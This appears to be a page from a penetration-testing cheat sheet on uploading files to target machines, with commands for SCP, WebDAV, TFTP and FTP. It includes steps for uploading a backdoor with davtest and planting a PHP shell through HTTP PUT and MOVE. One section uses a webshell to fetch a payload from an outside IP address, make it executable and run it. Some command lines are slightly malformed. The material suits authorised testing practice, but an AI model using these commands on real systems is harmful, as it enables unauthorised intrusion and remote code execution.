Uploading Files

  • SCP

    scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2

    scp localfile username@$ip:~/Folder/

    scp Linux_Exploit_Suggester.pl [email protected]:~

  • Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor

    davtest -move -sendbd auto -url http://$ip

    https://github.com/cldrn/davtest

    You can also upload a file using the PUT method with the curl command:

    curl -T 'leetshellz.txt' 'http://$ip'

    And rename it to an executable file using the MOVE method with the curl command:

    curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'

  • Upload shell using limited php shell cmd
    use the webshell to download and execute the meterpreter
    [curl -s --data "cmd=wgethttp://174.0.42.42:8000/dhn-O /tmp/evil" http://$ip/files/sh.php
    [curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/files/sh.php
    curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php

  • TFTP
    mkdir /tftp
    atftpd --daemon --port 69 /tftp
    cp /usr/share/windows-binaries/nc.exe /tftp/
    EX. FROM WINDOWS HOST:
    C:\Users\Offsec>tftp -i $ip get nc.exe

  • FTP
    apt-get update && apt-get install pure-ftpd

    #!/bin/bash
    groupadd ftpgroup
    useradd -g ftpgroup -d /dev/null -s /etc ftpuser
    pure-pw useradd offsec -u ftpuser -d /ftphome
    pure-pw mkdb
    cd /etc/pure-ftpd/auth/
    ln -s ../conf/PureDB 60pdb
    mkdir -p /ftphome
    chown -R ftpuser:ftpgroup /ftphome/

    /etc/init.d/pure-ftpd restart

results matching ""

    No results matching ""